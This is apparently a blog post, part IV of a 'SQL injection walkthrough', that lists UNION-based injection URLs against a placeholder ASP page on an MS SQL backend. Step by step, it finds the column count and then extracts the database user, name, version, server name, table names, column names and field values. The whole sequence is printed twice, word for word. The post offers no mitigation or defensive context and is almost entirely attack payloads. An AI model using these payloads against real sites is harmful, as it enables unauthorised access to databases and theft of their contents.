SQL Injection Walkthrough part IV
UNION SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
[FIELD 3 VALUE]
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
[FIELD 3 VALUE]
Labels: SQL TUTORIAL
posted by Sigit at
2:01 PM
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home